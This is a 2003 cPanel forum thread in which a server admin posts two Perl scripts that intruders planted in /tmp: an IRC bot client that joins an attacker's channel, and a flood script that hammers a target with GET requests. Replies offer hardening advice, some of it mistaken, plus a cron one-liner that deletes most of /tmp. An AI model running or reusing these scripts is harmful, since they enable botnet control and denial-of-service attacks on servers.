The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

supicious file in /tmp dir

Discussion in 'General Discussion' started by shann, Jun 23, 2003.

  1. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi All,

    I have got supecious filein our /tmp dir. This is the code they placed. Can anyone tell em how could we avoid thse?



    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];
    $chan=$ARGV[1];
    $botnick=$ARGV[2];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 6667,
    Proto => 'tcp' ) or die "****";

    while($line = <$sock>){
    print $line;

    sleep 3;
    print $sock "NICK $botnick\nUSER bot 0 0 :CCS bot\n";
    last;


    }

    while($line = <$sock>){
    print $line;
    #use next line if the server asks for a ping
    if($line =~ /^PING/){
    print $sock "PONG :" . (split(/ :/, $line))[1];
    }
    if($line =~ /(376|422)/i){
    print $sock "NICKSERV :identify nick_password\n";
    last;
    }
    }

    sleep 3;
    print $sock "JOIN #$chan\n";
    sleep 2;
    print $sock "PRIVMSG #$chan :elite hackbot connected\n";

    while ($line = <$sock>) {
    ($command, $text) = split(/ :/, $line); #$text is the stuff from the p
    ing or the text from the server

    cPanel.net Support Ticket Number:
     
    #1 shann, Jun 23, 2003
    Last edited: Jun 23, 2003
  2. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connection on port 6667 then all they have to do is log in though port 6667 and you are owned.

    If you didnt have a firewall you should probably check to make sure you havent been rooted.

    cPanel.net Support Ticket Number:
     
  3. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Thanks for your reply. Can you recommend some good firewall?

    Thanks sexyguy

    cPanel.net Support Ticket Number:
     
  4. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    So you didnt have a firewall? Im using Bastille. You better download chkrootkit, compile it and run it and look for signs of a rootkit. And you better close port 6667 soon. Again i really question Cpanel security here. This is now the third drop into /tmp that iv seen in a week so my question would be what is being done about this?

    cPanel.net Support Ticket Number:
     
  5. hostcp3

    hostcp3 Well-Known Member

    Joined:
    Jun 18, 2002
    Messages:
    156
    Likes Received:
    0
    Trophy Points:
    16
    *Please note*

    no liability taken for errors, faults or issues which come for using the information posted here.


    touch a file in /etc/cron.hourly or daily call it

    rmtmp.sh


    edit the file and paste this into it:

    pushd /tmp;rm -r `ls | grep -v horde.log | grep -v lost+found | grep -v mysql.sock`;popd


    let it run, just a warning, it does interfere a little with horde and other programs which use session id's.

    run it daily if you like.

    cPanel.net Support Ticket Number:
     
  6. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    If you have mounted /tmp as noexec nosuid (you really have to do this yourself obviously) it will be difficult for someone to execute the script.

    httpd chroot would be nice ofcourse :)
    What actually happened to the development of httpd chroot:


    For now, mounting /tmp as noexec nosuid, changing permissions on compilers to root only, blocking unused ports and ofcourse having your server software up to date, will make it very difficult for people to succeed with these /tmp attacks.

    With php you could set each user to use the /tmp in their home directory, instead of the /tmp directory everyone uses. I'm not sure what the advantage would be though, except for the fact that all php sessions are not stored in the 'general' /tmp anymore

    cPanel.net Support Ticket Number:
     
  7. VHDave

    VHDave Registered

    Joined:
    Feb 19, 2003
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    sexy_guy: That is absolutely incorrect. The script connects to the IRC server at the hostname and port specified (ARGV parameters via command prompt or other method of execution). It does not in any manner listen to port 6667 on your server. Having a firewall blocking incoming connections to port 6667 would be useless.

    cPanel.net Support Ticket Number:
     
  8. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi,

    The thing is they kepp putting file in /tmp dir and executing. Making our server goes down.

    Theis the latet code they palced. How could I aboid this. We don't have seprate partion for /tmp dir.

    This si the latest code they placed and our server went down,.

    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 80,
    Proto => 'tcp' ) or die "****";

    system("perl get.pl $serv &");
    system("perl get.pl $serv &");


    while(1){
    print $sock "GET\n";
    }


    Any help.
    tahnks

    cPanel.net Support Ticket Number:
     
Loading...

Share This Page